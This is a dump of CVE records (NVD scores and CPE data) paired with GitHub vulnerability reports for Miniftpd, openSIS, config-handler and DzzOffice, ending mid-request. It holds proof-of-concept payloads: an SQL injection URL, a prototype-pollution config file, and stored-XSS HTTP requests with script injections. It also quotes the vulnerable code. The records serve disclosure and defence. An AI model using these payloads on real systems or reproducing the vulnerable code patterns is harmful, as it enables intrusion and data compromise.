"matchCriteriaId": "DB53EB04-E558-487B-9A5A-7D87699903DD",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"120"
] | 120 | https://github.com/Gabe-commiter/Miniftpd/issues/2 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Gabe-commiter",
"Miniftpd"
] | Hi @Gabe-commiter,
I found a issue, that can trigger buffer overflow on your application. The issue exists on `do_retr()` function (from line 706 to 791) on ftpproto.c
At glance, we can see you defined `char arg[MAX_ARG]; `, it's not problem, however, when you use `sprintf()` on line 718 and 721, they trigger bufferoverflow.
```
typedef struct session
{
/*
Defined on common.h
#define MAX_COMMAND_LINE 1024
#define MAX_COMMAND 32
#define MAX_ARG 1024
#define MAX_BUFFER_SIZE 1024
*/
#define MAX_BUFFER_SIZE 1024
uid_t uid;
int ctrl_fd;//¿ØÖÆÃèÊö·û
char cmdline[MAX_COMMAND_LINE];
char cmd[MAX_COMMAND];
char arg[MAX_ARG];
....
<truncated>
....
}session_t;
```
```
static void do_retr(session_t *sess)
{
<truncated>
....
char buf[MAX_BUFFER_SIZE] = {0}; // Defined buffer called buf with MAX_BUFFER_SIZE length
//2Åжϴ«Êäģʽ
if(sess->is_ascii)
// trigger the buffer overflow because length of sess->arg is defined 1024 length,
// in order that, when sprintf is executed, the buffer `buf` can be write total len("Opening ASCII mode data connection for ") + MAX_BUFFER_SIZE + len(" (%ld bytes)")
sprintf(buf, "Opening ASCII mode data connection for %s (%ld bytes)", sess->arg, sbuf.st_size);//Ascii
else
// trigger the buffer overflow because length of sess->arg is defined 1024 length,
// in order that, when sprintf is executed, the buffer `buf` can be write total len("Opening ASCII mode data connection for ") + MAX_BUFFER_SIZE + len(" (%ld bytes)")
sprintf(buf, "Opening BINARY mode data connection for %s (%ld bytes)", sess->arg, sbuf.st_size);
...
<truncated>
...
}
```
**Solution**: Please use `snprintf()` to limit maximum input characters.
See: https://www.geeksforgeeks.org/snprintf-c-library/ | sprintf() trigger buffer overflow on `do_retr()` function | https://api.github.com/repos/Gabe-commiter/Miniftpd/issues/2/comments | 0 | 2021-08-24T18:07:12Z | 2021-08-24T18:07:12Z | https://github.com/Gabe-commiter/Miniftpd/issues/2 | 978,354,828 | 2 | 2,689 |
CVE-2021-40617 | 2021-10-11T19:15:07.667 | An SQL Injection vulnerability exists in openSIS Community Edition version 8.0 via ForgotPassUserName.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/192"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/192"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*",
"matchCriteriaId": "7159D18F-0406-4CBE-B985-FD2E8A5F07C9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/OS4ED/openSIS-Classic/issues/192 | [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | Hi @openSISAdmin, @ArnabOs4ed , I found a sql injection vulnerability in `ForgotPassUserName` function. I can inject special character in URL to escape SQL query in backend because of lacking of sanitize user input.
PoC:
`http://172.16.0.12:2222/ForgotPassUserName.php?used_for=username&u=admin%27%20or%20%271%27=%271`
### Bug:
``` $used_for=$_GET['used_for'];
if($used_for=='username')
{
$username = $_GET['u']; // <--- Lacking of sanitize input here!!!
$usr_type = $_GET['user_type'];
$found= false;
if($usr_type=='student')
{
$check_uname= DBGet(DBQuery('SELECT * FROM login_authentication WHERE USERNAME = \''.$username.'\' AND PROFILE_ID IN (SELECT ID FROM user_profiles WHERE PROFILE=\'student\')'));
}
elseif($usr_type=='staff')
{
$check_uname= DBGet(DBQuery('SELECT * FROM login_authentication WHERE USERNAME = \''.$username.'\' AND PROFILE_ID IN (SELECT ID FROM user_profiles WHERE ID NOT IN (0,3,4))'));
}
else
{
$check_uname= DBGet(DBQuery('SELECT * FROM login_authentication WHERE USERNAME = \''.$username.'\' AND PROFILE_ID IN (SELECT ID FROM user_profiles WHERE PROFILE=\'parent\')'));
}
if($check_uname[1]['USERNAME']!='')
{
echo '1';
}
else
echo '0';
}
```
In line 278, the code does not sanitize param `u`, in order that, I can escape the SQL query easily.
### Solution:
Use function `sqlSecurityFilter()` before assign `$_GET['u'];` to `username` param.
The code should look like:
```
$username = sqlSecurityFilter($_GET['u']);
``` | SQL Injection in ForgotPassUserName | https://api.github.com/repos/OS4ED/openSIS-Classic/issues/192/comments | 3 | 2021-09-01T12:17:31Z | 2021-09-04T19:15:41Z | https://github.com/OS4ED/openSIS-Classic/issues/192 | 985,081,276 | 192 | 2,690 |
CVE-2021-23448 | 2021-10-11T21:15:07.480 | All versions of package config-handler are vulnerable to Prototype Pollution when loading config files. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 2.5,
"source": "report@snyk.io",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jarradseers/config-handler/issues/1"
},
{
"source": "report@snyk.io",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-CONFIGHANDLER-1564947"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/jarradseers/config-handler/issues/1"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Mitigation",
"Third Party Advisory"
],
"url": "https://snyk.io/vuln/SNYK-JS-CONFIGHANDLER-1564947"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:config-handler_project:config-handler:1.0.0:*:*:*:*:*:*:*",
"matchCriteriaId": "45BF518C-C645-4580-A26D-AB71B5F9A686",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"1321"
] | 1321 | https://github.com/jarradseers/config-handler/issues/1 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"jarradseers",
"config-handler"
] | Hey i recently found that your package is vulnerable to Prototype Pollution.
**poc.js**
```
const config = require('config-handler')();
console.log(test)
console.log(config)
```
**package.json**
```
{
"constructor":{
"prototype":
{"test":"polluted"}
}
}
```
_output_
`polluted` | Vulnerable to Prototype Pollution | https://api.github.com/repos/jarradseers/config-handler/issues/1/comments | 0 | 2021-08-15T13:34:55Z | 2021-08-15T13:34:55Z | https://github.com/jarradseers/config-handler/issues/1 | 971,135,657 | 1 | 2,691 |
CVE-2021-40292 | 2021-10-12T18:15:08.413 | A Stored Cross Site Sripting (XSS) vulnerability exists in DzzOffice 2.02.1 via the settingnew parameter. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zyx0814/dzzoffice/issues/195"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zyx0814/dzzoffice/issues/195"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:dzzoffice:dzzoffice:2.02.1:*:*:*:*:*:*:*",
"matchCriteriaId": "0ECA901D-850D-468C-B516-01F29417313D",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/zyx0814/dzzoffice/issues/195 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"zyx0814",
"dzzoffice"
] | # Description:
Because of lacking of sanitizer of input data, attacker can injection malicious code into `settingnew` param to trigger Stored-XSS. The
vulnerability can affected `settingnew[sitename]` and `settingnew[reglinkname]` in template **[Source]\admin\setting\template\main.htm**
# To Reproduce
## XSS 1
Steps to reproduce the behavior:
1. Go to **System settings** -> **Basic settings**
2. Update **Site name** to `</title><script>alert('XSS');</script>`
3. Click **Save changes**
### Request
```
POST /admin.php?mod=setting HTTP/1.1
Host: 172.16.0.12:4444
Content-Length: 875
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.0.12:4444
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.0.12:4444/admin.php?mod=setting&operation=basic
Accept-Encoding: gzip, deflate
Accept-Language: vi,vi-VN;q=0.9,fr;q=0.8,en-US;q=0.7,en;q=0.6,sm;q=0.5,la;q=0.4,zh-CN;q=0.3,zh-TW;q=0.2,zh;q=0.1
Cookie: cywg_2132_saltkey=E2w57uH2; cywg_2132_lastvisit=1630101103; cywg_2132_ulastactivity=6590uIjzBHML3smc7veG8yziPxJyaiN4jgoE9aN3L3FvOCr3Ov1_; cywg_2132_auth=98cdFXW71mVy5meyxigIFZBObrEG4KvLnjvWpFFBrShhvIv6NcZaT5Tmjt1dT9-zVkgQGG9zU_5JoSbmIVgD; cywg_2132_checkupgrade=1; cywg_2132_seccodeSzIEkk50=19f7_dLG1127vHSBgGR0G6y16LF6cQM51ACBkEseX54k541eEvgeCbrH0TcgYvQ5PR6etghh5los4OaskYo; cywg_2132_seccodeSzfU1X90=9e1ed3Qs_MEPnj6GLhZUtvY31iLNApnW0Bbbu5Wb0wagKiv-plGw39bA62OwFToE3e6tATcJsoVPy3puCSI; cywg_2132_sid=u2tbOT; cywg_2132_lastact=1630120432%09index.php%09system; ORRL_2132_saltkey=SSddxNX7; ORRL_2132_lastvisit=1630117184; ORRL_2132_ulastactivity=4e4933KaEc2d5jrijCQZlYd-PcZ8j470p8v4gqPXPHDs6JlJdGR4; ORRL_2132_auth=72b8z5xQUV3VN3LNvb_ZW4mJtZAHAayP70K5xgK3robhOSslJQJJAbA7dcSHkuqq2eixxs9Ro4JL3Kvptdfm; ORRL_2132_lip=172.16.250.8%2C1630120785; ORRL_2132_checkupgrade=1; ORRL_2132_checkappupgrade=1; ORRL_2132_sid=v44Zfc; ORRL_2132_sendmail=1; ORRL_2132_lastact=1630122335%09index.php%09system
Connection: close
formhash=1eeef100&operation=basic&files%5B%5D=&settingnew%5Bsitelogo%5D=&settingnew%5Bsitename%5D=%3C%2Ftitle%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E&old_default_mod=&settingnew%5Bdefault_mod%5D=&settingnew%5Bdefaultdepartment%5D=other&settingnew%5Bthumbsize%5D%5Bsmall%5D%5Bwidth%5D=256&settingnew%5Bthumbsize%5D%5Bsmall%5D%5Bheight%5D=256&settingnew%5Bthumbsize%5D%5Bmiddle%5D%5Bwidth%5D=800&settingnew%5Bthumbsize%5D%5Bmiddle%5D%5Bheight%5D=600&settingnew%5Bthumbsize%5D%5Blarge%5D%5Bwidth%5D=1440&settingnew%5Bthumbsize%5D%5Blarge%5D%5Bheight%5D=900&settingnew%5Bthumb_active%5D=0&settingnew%5Ballowshare%5D=0&settingnew%5Bsitebeian%5D=&settingnew%5Bmetakeywords%5D=&settingnew%5Bmetadescription%5D=&settingnew%5Bstatcode%5D=&settingnew%5Bbbclosed%5D=0&settingnew%5Bclosedreason%5D=%E7%BD%91%E7%AB%99%E5%8D%87%E7%BA%A7%E4%B8%AD....&settingsubmit=save+Changes
```
### Response
```
HTTP/1.1 200 OK
Date: Sat, 28 Aug 2021 02:58:07 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHP/7.3.29
Set-Cookie: cywg_2132_lastact=1630119487%09admin.php%09setting; expires=Sun, 29-Aug-2021 02:58:07 GMT; Max-Age=86400; path=/
Set-Cookie: cywg_2132_sid=zIEkk5; expires=Sun, 29-Aug-2021 02:58:07 GMT; Max-Age=86400; path=/
Content-Length: 3218
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<title>提示信息 - test - </title>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="generator" content="DzzOffice" />
<meta name="author" content="DzzOffice" />
<meta name="copyright" content="2012-2021-08-28 www.dzzoffice.com" />
<meta name="MSSmartTagsPreventParsing" content="True" />
<meta http-equiv="MSThemeCompatible" content="Yes" />
<meta name="renderer" content="webkit">
<base href="http://172.16.0.12:4444/" />
<link rel="stylesheet" type="text/css" href="static/bootstrap/css/bootstrap.min.css?m1R">
<link rel="stylesheet" type="text/css" href="static/css/app_manage.css?m1R">
<script type="text/javascript" src="static/jquery/jquery.min.js?m1R" ></script>
<script type="text/javascript" src="static/jquery/jquery.json-2.4.min.js?m1R" ></script>
<script type="text/javascript">var DZZSCRIPT='DZZSCRIPT',LANG='zh-cn', STATICURL = 'static/', IMGDIR = 'static/image/common', VERHASH = 'm1R', charset = 'utf-8', dzz_uid = '1', cookiepre = 'cywg_2132_', cookiedomain = '', cookiepath = '/',attackevasive = '0', disallowfloat = '', REPORTURL = 'aHR0cDovLzE3Mi4xNi4wLjEyOjQ0NDQvYWRtaW4ucGhwP21vZD1zZXR0aW5n', SITEURL = 'http://172.16.0.12:4444/', JSPATH = 'static/js/',MOD_PATH='admin/setting',APP_URL='admin.php?mod=setting',MOD_URL='admin.php?mod=setting';</script>
<script type="text/javascript" src="./data/template/core_common_showmessage_common_zh-cn.js" ></script><script type="text/javascript" src="static/js/common.js?m1R" ></script>
</head>
<body id="nv_dzz" class="">
<div id="append_parent" style="z-index:99999;"></div><div id="ajaxwaitid" style="z-index:99999;"></div><div id="ct" class="container " style="position: absolute;top: 30%;width: 100%;text-align: center;">
<div class="">
<div class="f_c altw">
<div id="messagetext">
<img src="static/image/common/noFilePage-successful.png">
<h5 style="color: #999999;">操作成功<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://172.16.0.12:4444/admin.php?mod=setting&operation=access';", 3000);</script></h5>
<button class="btn-jump btn btn-primary" onclick="location.href='http://172.16.0.12:4444/admin.php?mod=setting&operation=access';return false;" >立即跳转(<span class="num">3</span>s)</button>
</div>
</div>
<script type="text/javascript">
jQuery(document).ready(function(){
function jump(cont){
window.setTimeout(function(){
cont--;
if(cont>0){
$('.num').text(cont);
jump(cont);
}
},1000)
}
jump(3);
});
</script>
</div>
</div>
<script type="text/javascript" src="misc.php?mod=sendwx&rand=1630119487" ></script>
<script type="text/javascript">
jQuery(document).ready(function(){
try{jQuery('#systemNotice').load('misc.php?mod=upgrade&action=upgradenotice');}catch(e){};
});
</script>
<div id="systemNotice" class="systemNotice" style="position: fixed;right:10px;bottom:10px;max-width:50%;box-shadow:0px 5px 10px RGBA(0,0,0,0.3);z-index:999999"></div>
</body>
</html>
```
### PoC:


## XSS 2
Steps to reproduce the behavior:
1. Go to **System settings** -> **Login settings**
2. Update **Registration link name** to `"/><script>alert('XSS 2');</script>`
3. Click **Save changes**
### Request
```
POST /admin.php?mod=setting HTTP/1.1
Host: 172.16.0.12:4444
Content-Length: 260
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.16.0.12:4444
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.16.0.12:4444/admin.php?mod=setting&operation=access
Accept-Encoding: gzip, deflate
Accept-Language: vi,vi-VN;q=0.9,fr;q=0.8,en-US;q=0.7,en;q=0.6,sm;q=0.5,la;q=0.4,zh-CN;q=0.3,zh-TW;q=0.2,zh;q=0.1
Cookie: cywg_2132_saltkey=E2w57uH2; cywg_2132_lastvisit=1630101103; cywg_2132_ulastactivity=6590uIjzBHML3smc7veG8yziPxJyaiN4jgoE9aN3L3FvOCr3Ov1_; cywg_2132_auth=98cdFXW71mVy5meyxigIFZBObrEG4KvLnjvWpFFBrShhvIv6NcZaT5Tmjt1dT9-zVkgQGG9zU_5JoSbmIVgD; cywg_2132_checkupgrade=1; cywg_2132_seccodeSzIEkk50=19f7_dLG1127vHSBgGR0G6y16LF6cQM51ACBkEseX54k541eEvgeCbrH0TcgYvQ5PR6etghh5los4OaskYo; cywg_2132_seccodeSzfU1X90=9e1ed3Qs_MEPnj6GLhZUtvY31iLNApnW0Bbbu5Wb0wagKiv-plGw39bA62OwFToE3e6tATcJsoVPy3puCSI; cywg_2132_sid=u2tbOT; cywg_2132_lastact=1630120432%09index.php%09system; ORRL_2132_saltkey=SSddxNX7; ORRL_2132_lastvisit=1630117184; ORRL_2132_ulastactivity=4e4933KaEc2d5jrijCQZlYd-PcZ8j470p8v4gqPXPHDs6JlJdGR4; ORRL_2132_auth=72b8z5xQUV3VN3LNvb_ZW4mJtZAHAayP70K5xgK3robhOSslJQJJAbA7dcSHkuqq2eixxs9Ro4JL3Kvptdfm; ORRL_2132_lip=172.16.250.8%2C1630120785; ORRL_2132_checkupgrade=1; ORRL_2132_checkappupgrade=1; ORRL_2132_sid=BCWawI; ORRL_2132_sendmail=1; ORRL_2132_lastact=1630121432%09index.php%09system
Connection: close
formhash=1eeef100&operation=access&settingnew%5Breglinkname%5D=%22%2F%3E%3Cscript%3Ealert%28%27XSS+2%27%29%3B%3C%2Fscript%3E&settingnew%5Bpwlength%5D=0&settingnew%5Bregverify%5D=0&settingnew%5Bbbrules%5D=0&settingnew%5Bbbrulestxt%5D=&settingsubmit=save+Changes
```
### Response
```
HTTP/1.1 200 OK
Date: Sat, 28 Aug 2021 03:30:32 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29
X-Powered-By: PHP/7.3.29
Set-Cookie: ORRL_2132_lastact=1630121432%09admin.php%09setting; expires=Sun, 29-Aug-2021 03:30:32 GMT; Max-Age=86399; path=/
Set-Cookie: ORRL_2132_sid=BCWawI; expires=Sun, 29-Aug-2021 03:30:32 GMT; Max-Age=86399; path=/
Content-Length: 3218
Connection: close
Content-Type: text/html; charset=utf-8
<!DOCTYPE html>
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
<title>提示信息 - Test - </title>
<meta name="keywords" content="" />
<meta name="description" content="" />
<meta name="generator" content="DzzOffice" />
<meta name="author" content="DzzOffice" />
<meta name="copyright" content="2012-2021-08-28 www.dzzoffice.com" />
<meta name="MSSmartTagsPreventParsing" content="True" />
<meta http-equiv="MSThemeCompatible" content="Yes" />
<meta name="renderer" content="webkit">
<base href="http://172.16.0.12:4444/" />
<link rel="stylesheet" type="text/css" href="static/bootstrap/css/bootstrap.min.css?m4B">
<link rel="stylesheet" type="text/css" href="static/css/app_manage.css?m4B">
<script type="text/javascript" src="static/jquery/jquery.min.js?m4B" ></script>
<script type="text/javascript" src="static/jquery/jquery.json-2.4.min.js?m4B" ></script>
<script type="text/javascript">var DZZSCRIPT='DZZSCRIPT',LANG='zh-cn', STATICURL = 'static/', IMGDIR = 'static/image/common', VERHASH = 'm4B', charset = 'utf-8', dzz_uid = '1', cookiepre = 'ORRL_2132_', cookiedomain = '', cookiepath = '/',attackevasive = '0', disallowfloat = '', REPORTURL = 'aHR0cDovLzE3Mi4xNi4wLjEyOjQ0NDQvYWRtaW4ucGhwP21vZD1zZXR0aW5n', SITEURL = 'http://172.16.0.12:4444/', JSPATH = 'static/js/',MOD_PATH='admin/setting',APP_URL='admin.php?mod=setting',MOD_URL='admin.php?mod=setting';</script>
<script type="text/javascript" src="./data/template/core_common_showmessage_common_zh-cn.js" ></script><script type="text/javascript" src="static/js/common.js?m4B" ></script>
</head>
<body id="nv_dzz" class="">
<div id="append_parent" style="z-index:99999;"></div><div id="ajaxwaitid" style="z-index:99999;"></div><div id="ct" class="container " style="position: absolute;top: 30%;width: 100%;text-align: center;">
<div class="">
<div class="f_c altw">
<div id="messagetext">
<img src="static/image/common/noFilePage-successful.png">
<h5 style="color: #999999;">操作成功<script type="text/javascript" reload="1">setTimeout("window.location.href ='http://172.16.0.12:4444/admin.php?mod=setting&operation=access';", 3000);</script></h5>
<button class="btn-jump btn btn-primary" onclick="location.href='http://172.16.0.12:4444/admin.php?mod=setting&operation=access';return false;" >立即跳转(<span class="num">3</span>s)</button>
</div>
</div>
<script type="text/javascript">
jQuery(document).ready(function(){
function jump(cont){
window.setTimeout(function(){
cont--;
if(cont>0){
$('.num').text(cont);
jump(cont);
}
},1000)
}
jump(3);
});
</script>
</div>
</div>
<script type="text/javascript" src="misc.php?mod=sendwx&rand=1630121432" ></script>
<script type="text/javascript">
jQuery(document).ready(function(){
try{jQuery('#systemNotice').load('misc.php?mod=upgrade&action=upgradenotice');}catch(e){};
});
</script>
<div id="systemNotice" class="systemNotice" style="position: fixed;right:10px;bottom:10px;max-width:50%;box-shadow:0px 5px 10px RGBA(0,0,0,0.3);z-index:999999"></div>
</body>
</html>
```
### PoC:


| Lacking of sanitizer of input data lead to Stored-XSS | https://api.github.com/repos/zyx0814/dzzoffice/issues/195/comments | 0 | 2021-08-28T04:05:10Z | 2021-09-07T03:12:53Z | https://github.com/zyx0814/dzzoffice/issues/195 | 981,720,526 | 195 | 2,692 |
CVE-2021-40618 | 2021-10-12T18:15:08.453 | An SQL Injection vulnerability exists in openSIS Classic 8.0 via the 1) ADDR_CONT_USRN, 2) ADDR_CONT_PSWD, 3) SECN_CONT_USRN or 4) SECN_CONT_PSWD parameters in HoldAddressFields.php. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/193"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/OS4ED/openSIS-Classic/issues/193"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*",
"matchCriteriaId": "7159D18F-0406-4CBE-B985-FD2E8A5F07C9",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/OS4ED/openSIS-Classic/issues/193 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"OS4ED",
"openSIS-Classic"
] | # Description:
Because of lacking of sanitizer of input data, attacker can injection malicious sql into query by control parameters such as `ADDR_CONT_USRN`, `ADDR_CONT_PSWD` or `SECN_CONT_USRN`, `SECN_CONT_PSWD` in file `HoldAddressFields.php`.
### Request
```
POST /HoldAddressFields.php HTTP/1.1
Host: 172.16.0.12:2222
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
